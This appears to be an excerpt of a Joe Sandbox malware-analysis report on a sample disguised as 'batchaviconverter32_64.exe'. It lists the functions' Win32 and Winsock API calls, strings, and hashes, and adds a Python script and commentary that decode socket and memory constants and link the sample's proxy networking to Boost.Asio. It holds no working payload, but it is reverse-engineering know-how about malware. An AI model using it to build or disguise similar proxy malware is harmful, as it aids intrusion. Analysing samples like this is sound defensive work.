                                                              • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D82EFD
                                                              • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D82F0C
                                                              • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02D82F36
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$Socketsetsockopt
                                                              • String ID:
                                                              • API String ID: 2093263913-0
                                                              • Opcode ID: f3580a45de6c6fc9e317be4cd35a34126ff54a7eb72a268560dedb9bb46eabc5
                                                              • Instruction ID: ce62a50c1f469cf462a3fdde62d8ac445c31b4187a5eae90c7edbf8f8ba60834
                                                              • Opcode Fuzzy Hash: f3580a45de6c6fc9e317be4cd35a34126ff54a7eb72a268560dedb9bb46eabc5
                                                              • Instruction Fuzzy Hash: F9017575940204BBDB205F66DC48F9ABBA9EB89761F008565F9089B281D7708D00CBB1
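The blocks above record each function's Win32 calls in the order the sandbox saw them, with arguments printed as raw hex. As an added example that is not part of the Joe Sandbox report or of the analysed sample, the following Python script parses listings in this format, keeps the recorded call order, separates "Part of subcall function" entries from the function's own calls, and decodes the constants that matter for reading the network and memory-management code: for the setsockopt call at 02D82F36, level 0x29 is IPPROTO_IPV6 and option 0x1B is IPV6_V6ONLY (Windows SDK values), and for the VirtualFree calls the third argument 0x4000 is MEM_DECOMMIT and 0x8000 is MEM_RELEASE. The embedded sample text is constructed from three abbreviated blocks of this report; the constant table only covers the handful of options listed there, and anything else is reported as raw values.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in the shape of the function listing above (three
# abbreviated blocks; the real report carries more fields per block).
SAMPLE = """\
APIs
• WSASetLastError.WS2_32(00000000), ref: 02D82EEE
• WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D82EFD
• setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02D82F36
Memory Dump Source
• Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
Similarity
• API ID: ErrorLast$Socketsetsockopt
• Opcode ID: f3580a45de6c6fc9e317be4cd35a34126ff54a7eb72a268560dedb9bb46eabc5
APIs
• htons.WS2_32(?), ref: 02D83DA2
  • Part of subcall function 02D83BD3: __EH_prolog.LIBCMT ref: 02D83BD8
• htonl.WS2_32(00000000), ref: 02D83DB9
Memory Dump Source
• Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
Similarity
• API ID: htonlhtons$H_prolog
• Opcode ID: 996dc61b3ef53d79eb2f56b558d00e602a5177a077722ead19e006dce39b51b3
APIs
• VirtualFree.KERNEL32(FFFFFFFF,00001000,00004000,7591DFF0,?,00000000,?,-@,0040490E), ref: 004047F0
Memory Dump Source
• Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FreeVirtual
• Opcode ID: db728298b98a3dab2ecdb4dab480861bd9016d5beafec50a15f5b98851f5bcbc
"""

@dataclass
class ApiCall:
    name: str
    module: str
    args: list            # argument tokens exactly as printed ('?' = unresolved)
    ref: str              # call-site address
    subcall_of: str = ""  # set when the line is "Part of subcall function X"

@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    source_file: str = ""
    api_id: str = ""
    opcode_id: str = ""

# "• Name.MODULE(args), ref: ADDR" or "• Part of subcall function X: Name.MODULE ref: ADDR"
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w:~<>]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>Source File|API ID|Opcode ID):\s*(?P<val>.*)$")

# Windows SDK constants for the options seen in this listing (ws2ipdef.h / winnt.h).
SOCKOPT_NAMES = {
    (0xFFFF, 0x0004): "SOL_SOCKET/SO_REUSEADDR",
    (0xFFFF, 0x0008): "SOL_SOCKET/SO_KEEPALIVE",
    (0x0006, 0x0001): "IPPROTO_TCP/TCP_NODELAY",
    (0x0029, 0x001B): "IPPROTO_IPV6/IPV6_V6ONLY",
}
FREE_TYPES = {0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}

def parse_blocks(text):
    """Split the listing at each 'APIs' header and collect calls and identifying fields."""
    blocks, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if current is None:
            continue
        m = CALL_RE.match(line)
        if m:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            current.apis.append(ApiCall(m.group("name"), m.group("mod"), args,
                                        m.group("ref").upper(), m.group("sub") or ""))
            continue
        f = FIELD_RE.match(line)
        if f:
            key, val = f.group("key"), f.group("val").strip()
            if key == "Source File":
                current.source_file = val.split(",")[0]   # drop ", Offset: ..., based on PE: ..."
            elif key == "API ID":
                current.api_id = val
            else:
                current.opcode_id = val
    return blocks

def _hex(tok):
    """Int value of a hex argument token, or None for '?' and stack noise such as '-@'."""
    try:
        return int(tok, 16)
    except ValueError:
        return None

def decode_call(call):
    """Symbolic names for the constant arguments of setsockopt and VirtualFree; '' otherwise."""
    if call.name == "setsockopt" and len(call.args) >= 3:
        level, opt = _hex(call.args[1]), _hex(call.args[2])
        if level is None or opt is None:
            return "unresolved"
        return SOCKOPT_NAMES.get((level, opt), f"level=0x{level:X} opt=0x{opt:X}")
    if call.name == "VirtualFree" and len(call.args) >= 3:
        ft = _hex(call.args[2])
        return "unresolved" if ft is None else FREE_TYPES.get(ft, f"dwFreeType=0x{ft:X}")
    return ""

def summarize(blocks, module=None):
    """Per block: (opcode id prefix, source dump, ordered own calls, decoded constants).
    Subcall entries are skipped; 'module' restricts the view to e.g. WS2_32."""
    rows = []
    for b in blocks:
        calls = [c for c in b.apis
                 if not c.subcall_of and (module is None or c.module == module)]
        if not calls:
            continue
        notes = [n for n in (decode_call(c) for c in calls) if n]
        rows.append((b.opcode_id[:12], b.source_file, [c.name for c in calls], notes))
    return rows

if __name__ == "__main__":
    for opcode, dump, names, notes in summarize(parse_blocks(SAMPLE)):
        print(opcode, dump.split(".")[3], " -> ".join(names), notes)
```

Read against the listing, the decoded sequence WSASetLastError(0), WSASocketA(..., WSA_FLAG_OVERLAPPED = 1), setsockopt(IPPROTO_IPV6, IPV6_V6ONLY) is the way Boost.Asio opens an AF_INET6 socket on Windows (it clears the last error, creates an overlapped socket for IOCP and then clears V6ONLY so the socket also takes IPv4-mapped peers). Together with the boost_1_55_0 path strings in the blocks below, this is consistent with the proxy's network layer being Asio rather than hand-written Winsock code, which is worth knowing before spending time reversing those functions.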
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                              • String ID:
                                                              • API String ID: 3016257755-0
                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                              • Instruction ID: 90c5734dd1d3332497403f757fabdb775d88ef764105b7d0e35aa8a2cca3e1ba
                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                              • Instruction Fuzzy Hash: 9C014B7606014ABBCF126E84CC418EE3F67BB0D354F488416FA1899230E737C9B1EB91
                                                              APIs
                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D824A9
                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02D824B8
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02D824CD
                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02D824D4
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                              • String ID:
                                                              • API String ID: 4018804020-0
                                                              • Opcode ID: 286c41a72aee33c908066edb53255fa1173566d215622ef84599f817285bce71
                                                              • Instruction ID: bf068226e98e22695b5c3bffdcc5bfb61be724af8160581231d8a643b1cf1203
                                                              • Opcode Fuzzy Hash: 286c41a72aee33c908066edb53255fa1173566d215622ef84599f817285bce71
                                                              • Instruction Fuzzy Hash: 7DF03C72540205AFEB00EFA9E849F9ABBBCFF44711F108419FA05C6241D771E960CFA4
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D82009
                                                              • RtlDeleteCriticalSection.NTDLL(?), ref: 02D82028
                                                              • CloseHandle.KERNEL32(00000000), ref: 02D82037
                                                              • CloseHandle.KERNEL32(00000000), ref: 02D8204E
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                              • String ID:
                                                              • API String ID: 2456309408-0
                                                              • Opcode ID: 0f833d0cacea8466ddedc41491d18aa834be8201d27dde4c99f3fef94eb35e0b
                                                              • Instruction ID: 5efb91fcf6e11d223f91c8fca6c53b43b0731c6df62a7933cb862e5d43c21a6e
                                                              • Opcode Fuzzy Hash: 0f833d0cacea8466ddedc41491d18aa834be8201d27dde4c99f3fef94eb35e0b
                                                              • Instruction Fuzzy Hash: FE0169719006449BD728AF54E908BAAFBB5FF04704F20495EE84692BA0CBB46D48CF69
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Event$H_prologSleep
                                                              • String ID:
                                                              • API String ID: 1765829285-0
                                                              • Opcode ID: a0156326695614888bf16bae32458a56aa83a377e61b3c1dda98bbd7198d7e67
                                                              • Instruction ID: 201132100f51793ef996c34dd50acf7bbe236cd6cbd8894ea641a098337a240b
                                                              • Opcode Fuzzy Hash: a0156326695614888bf16bae32458a56aa83a377e61b3c1dda98bbd7198d7e67
                                                              • Instruction Fuzzy Hash: B4F09A32A40510EFDB009FA4E889F8DBBB0FF08321F1081A8FA0A8B390C7359C40CB65
                                                              APIs
                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,r@,0040485C,r@,7591DFF0,?,00000000,?,-@,0040490E,00000010,00402FA3), ref: 0040476B
                                                              • HeapFree.KERNEL32(00000000,?), ref: 004047A1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Free$HeapVirtual
                                                              • String ID: r@$r@
                                                              • API String ID: 3783212868-1712950306
                                                              • Opcode ID: 615be266f2133a35edff91ca5e545c140f31fce35e26d2f64644c01e7612d901
                                                              • Instruction ID: 9f28707f468f96f8ba01f1c404cbd9d3f6c084a3717c71e7c0065962692db169
                                                              • Opcode Fuzzy Hash: 615be266f2133a35edff91ca5e545c140f31fce35e26d2f64644c01e7612d901
                                                              • Instruction Fuzzy Hash: C6F01774544210DFC3248F08EE08A427BA0FB88720B11867EF996672E1C371AC50CF88
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog_memmove
                                                              • String ID: &'
                                                              • API String ID: 3529519853-655172784
                                                              • Opcode ID: fe8097e77034f966722bd6cf4c8b067939e6c1578abbbbcd8db11f0118bf52a5
                                                              • Instruction ID: 8fdf3b5e19ae643d68de024bc502a51d56cdebd4d5f59b0aa1d7335d81087c97
                                                              • Opcode Fuzzy Hash: fe8097e77034f966722bd6cf4c8b067939e6c1578abbbbcd8db11f0118bf52a5
                                                              • Instruction Fuzzy Hash: 23617C71D002199BDF25EFA4C990BEEBBB6EF48310F10816AE445AB380D7709E45CFA1
                                                              APIs
                                                              • GetCPInfo.KERNEL32(?,00000000), ref: 00404ED1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Info
                                                              • String ID: $
                                                              • API String ID: 1807457897-3032137957
                                                              • Opcode ID: ade2e129719512a706aeac876f0a8c01095c6a06ec5d81e25aee3eb1febfb5f9
                                                              • Instruction ID: e64d793a5bd47a750bf71bc710b27f1b951018593c94bf49e3c2bba34da37a12
                                                              • Opcode Fuzzy Hash: ade2e129719512a706aeac876f0a8c01095c6a06ec5d81e25aee3eb1febfb5f9
                                                              • Instruction Fuzzy Hash: 1D416B710142985EEB169714CE59FEB3FE8EB02704F1404F6DA49F61D2C2794924DBBB
                                                              APIs
                                                                • Part of subcall function 02D82D39: WSASetLastError.WS2_32(00000000), ref: 02D82D47
                                                                • Part of subcall function 02D82D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D82D5C
                                                              • WSASetLastError.WS2_32(00000000), ref: 02D82E6D
                                                              • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02D82E83
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$Sendselect
                                                              • String ID: 3'
                                                              • API String ID: 2958345159-280543908
                                                              • Opcode ID: 58a7c0928307a553672228ad508ee9754844e318d640bd3d8e6f632988e53b26
                                                              • Instruction ID: d11de0eb791b53a46f08eb9ea13ca1b7af7eb19da83be46b737d4e44b719a055
                                                              • Opcode Fuzzy Hash: 58a7c0928307a553672228ad508ee9754844e318d640bd3d8e6f632988e53b26
                                                              • Instruction Fuzzy Hash: 62319AB5A002499BDF11EFA4D848BEEBBAAEF04314F00455AEC4997340F7749D55CBE0
                                                              APIs
                                                              • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02D88305,?,?,00000000), ref: 02D89602
                                                              • getsockname.WS2_32(?,?,?), ref: 02D89618
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastgetsockname
                                                              • String ID: &'
                                                              • API String ID: 566540725-655172784
                                                              • Opcode ID: 26ba90ce91650b4fc60d029b0ddc148eeae75404b74a52f59c22a8d8d4ed93bb
                                                              • Instruction ID: 6bb22408f82bafbea01824c10a74a18764bedf57d268a384d88d9b7080a00574
                                                              • Opcode Fuzzy Hash: 26ba90ce91650b4fc60d029b0ddc148eeae75404b74a52f59c22a8d8d4ed93bb
                                                              • Instruction Fuzzy Hash: 20218E76A042489BDB10EF68D844ADEB7F5FF4C320F11816AE918EB380D730ED458BA0
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D8CCDB
                                                                • Part of subcall function 02D8D299: std::exception::exception.LIBCMT ref: 02D8D2C6
                                                                • Part of subcall function 02D8DAAF: __EH_prolog.LIBCMT ref: 02D8DAB4
                                                                • Part of subcall function 02D93A7C: _malloc.LIBCMT ref: 02D93A94
                                                                • Part of subcall function 02D8D2F6: __EH_prolog.LIBCMT ref: 02D8D2FB
                                                              Strings
                                                              • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02D8CD11
                                                              • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02D8CD18
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$_mallocstd::exception::exception
                                                              • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                              • API String ID: 1953324306-412195191
                                                              • Opcode ID: 448fed499c0b35a47d095581c5cf5a25e280bf4e8c6750a3a1ebfc8f6f0fd46d
                                                              • Instruction ID: dd492f7e6d36d9818c7ff9bc1ba6c5297752fb9bf065c8bc06fca53c3cc8d02f
                                                              • Opcode Fuzzy Hash: 448fed499c0b35a47d095581c5cf5a25e280bf4e8c6750a3a1ebfc8f6f0fd46d
                                                              • Instruction Fuzzy Hash: 94219C71E04248DBDB18FFE8D464AAEBBB6EF54704F044549E806A7380DB709E44CBA1
                                                              APIs
                                                              • WSASetLastError.WS2_32(00000000), ref: 02D82AEA
                                                              • connect.WS2_32(?,?,?), ref: 02D82AF5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastconnect
                                                              • String ID: 3'
                                                              • API String ID: 374722065-280543908
                                                              • Opcode ID: ce0ca0f957c953e40319e31f5466b4422454a57d0317b9465b6f1de4ff926547
                                                              • Instruction ID: 9f5e71a90639d0214e362de1e47cbdfee181d2e71a78a0798645f2494f8dd2a3
                                                              • Opcode Fuzzy Hash: ce0ca0f957c953e40319e31f5466b4422454a57d0317b9465b6f1de4ff926547
                                                              • Instruction Fuzzy Hash: E1219575E04244ABDF10BFA4D408ABEBBBAEF44325F108559EC1997380DB749E059FA1
                                                              APIs
                                                              • _malloc.LIBCMT ref: 02D8535D
                                                                • Part of subcall function 02D92EDC: __FF_MSGBANNER.LIBCMT ref: 02D92EF3
                                                                • Part of subcall function 02D92EDC: __NMSG_WRITE.LIBCMT ref: 02D92EFA
                                                                • Part of subcall function 02D92EDC: RtlAllocateHeap.NTDLL(00730000,00000000,00000001), ref: 02D92F1F
                                                              • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 02D8536F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateFolderHeapPathSpecial_malloc
                                                              • String ID: \save.dat
                                                              • API String ID: 4128168839-3580179773
                                                              • Opcode ID: 042bc3f97846d91b61d37ce8d6df41ff7a2721ff52cfb2f587773f475faa04d3
                                                              • Instruction ID: b2dccf62dd1384845191702a782123ca1600bd4303aa57b8d87c5293e2f47e0c
                                                              • Opcode Fuzzy Hash: 042bc3f97846d91b61d37ce8d6df41ff7a2721ff52cfb2f587773f475faa04d3
                                                              • Instruction Fuzzy Hash: 7D115C729042447BDF259E659C90E6FFFABDF83650F5501E9F88567701D6A20D02C6B0
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe,00000104,?,00000000,?,?,?,?,00402DEE), ref: 00403374
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: FileModuleName
                                                              • String ID: C:\Users\user\AppData\Local\Batch AVI Converter\batchaviconverter32_64.exe$5s
                                                              • API String ID: 514040917-3481735834
                                                              • Opcode ID: 4b8fbbe1edf07751b100c16af9a753027d93dae450da557b14ba1428fad57fc3
                                                              • Instruction ID: 9914cd9322f57819df26321eb5c0d5781e1a9b7dbf92489965342876274e8e32
                                                              • Opcode Fuzzy Hash: 4b8fbbe1edf07751b100c16af9a753027d93dae450da557b14ba1428fad57fc3
                                                              • Instruction Fuzzy Hash: 7E113DB2900218BFC711EF99D9C5C9B7BACEB44358B0000BAF905A7281DA759E558BA9
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D8396A
                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 02D839C1
                                                                • Part of subcall function 02D81410: std::exception::exception.LIBCMT ref: 02D81428
                                                                • Part of subcall function 02D8A550: __EH_prolog.LIBCMT ref: 02D8A555
                                                                • Part of subcall function 02D8A550: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D8A564
                                                                • Part of subcall function 02D8A550: __CxxThrowException@8.LIBCMT ref: 02D8A583
                                                              Strings
                                                              • Day of month is not valid for year, xrefs: 02D839AC
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                              • String ID: Day of month is not valid for year
                                                              • API String ID: 1404951899-1521898139
                                                              • Opcode ID: eff93f4136ffd35f5988614ff0ef9c1486da3544e489f7bfc14e2a1a6f5c84bb
                                                              • Instruction ID: 31108e1fdb49c747a3e0015c7eb641cb804a2c9397a53a2f80da792e81e61de3
                                                              • Opcode Fuzzy Hash: eff93f4136ffd35f5988614ff0ef9c1486da3544e489f7bfc14e2a1a6f5c84bb
                                                              • Instruction Fuzzy Hash: 8101B17A810209AEDF04FFA4D805AEEB7B9FF14710F40405AEC04A3340EB748E55CBA5
                                                              APIs
                                                              • std::exception::exception.LIBCMT ref: 02D8FA49
                                                              • __CxxThrowException@8.LIBCMT ref: 02D8FA5E
                                                                • Part of subcall function 02D93A7C: _malloc.LIBCMT ref: 02D93A94
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Exception@8Throw_mallocstd::exception::exception
                                                              • String ID: bad allocation
                                                              • API String ID: 4063778783-2104205924
                                                              • Opcode ID: c3a8c4ab630db4580771d6df0c36e92a1d4486f7882917bc170555dd41f64c3f
                                                              • Instruction ID: 903ba5c17598d471ae98cd5ef0c4902f03cebf9107ede912a9bd944d21b152f6
                                                              • Opcode Fuzzy Hash: c3a8c4ab630db4580771d6df0c36e92a1d4486f7882917bc170555dd41f64c3f
                                                              • Instruction Fuzzy Hash: 35F0AE7060830DAADF04F6A898559BF73FDEB05714F500556F521E3780EBB0EE04C5A5
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D83C1B
                                                              • std::bad_exception::bad_exception.LIBCMT ref: 02D83C30
                                                                • Part of subcall function 02D923E7: std::exception::exception.LIBCMT ref: 02D923F1
                                                                • Part of subcall function 02D8A589: __EH_prolog.LIBCMT ref: 02D8A58E
                                                                • Part of subcall function 02D8A589: __CxxThrowException@8.LIBCMT ref: 02D8A5B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                              • String ID: bad cast
                                                              • API String ID: 1300498068-3145022300
                                                              • Opcode ID: 3889cc47b8cc4a9e18445dc5385b4d1eb76ded0b10a960119149411232da9017
                                                              • Instruction ID: 046fccec2dc0790d414d398d2078c31339a406e621a652c3ee84125aeebad65a
                                                              • Opcode Fuzzy Hash: 3889cc47b8cc4a9e18445dc5385b4d1eb76ded0b10a960119149411232da9017
                                                              • Instruction Fuzzy Hash: 7BF0A072D00504DBCB09EF58E450AEAB776EF51321F5040AEED055B350CB729E4ACAA1
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D838D2
                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 02D838F1
                                                                • Part of subcall function 02D81410: std::exception::exception.LIBCMT ref: 02D81428
                                                                • Part of subcall function 02D888BE: _memmove.LIBCMT ref: 02D888DE
                                                              Strings
                                                              • Year is out of valid range: 1400..10000, xrefs: 02D838E0
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                              • String ID: Year is out of valid range: 1400..10000
                                                              • API String ID: 3258419250-2344417016
                                                              • Opcode ID: ba6e559eb08ed25a8887231a411894cf9208a1523a1084df71ad019767a510ca
                                                              • Instruction ID: 4d7547c9ebe1c38d60821e9f1e1f413c397821e09ec9712db3040baab513adca
                                                              • Opcode Fuzzy Hash: ba6e559eb08ed25a8887231a411894cf9208a1523a1084df71ad019767a510ca
                                                              • Instruction Fuzzy Hash: 2AE092B2E401049BE714FB989821FDDB775EB48720F40044AE801A7780DAB51D04CBA5
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D83886
                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 02D838A5
                                                                • Part of subcall function 02D81410: std::exception::exception.LIBCMT ref: 02D81428
                                                                • Part of subcall function 02D888BE: _memmove.LIBCMT ref: 02D888DE
                                                              Strings
                                                              • Day of month value is out of range 1..31, xrefs: 02D83894
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                              • String ID: Day of month value is out of range 1..31
                                                              • API String ID: 3258419250-1361117730
                                                              • Opcode ID: 4096fa0e702a4b78002a82d5664e544ba9685de531e654677c6594698948e709
                                                              • Instruction ID: c97ff0cf5ca6de5f8121d1dcb7760929a556326be95c3456c23fec495abd7d70
                                                              • Opcode Fuzzy Hash: 4096fa0e702a4b78002a82d5664e544ba9685de531e654677c6594698948e709
                                                              • Instruction Fuzzy Hash: 80E0D8B2E001049BE714BF98D821FDDB775EB48B20F40004EE801B3780DAB51D048BE5
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D8391E
                                                              • std::runtime_error::runtime_error.LIBCPMT ref: 02D8393D
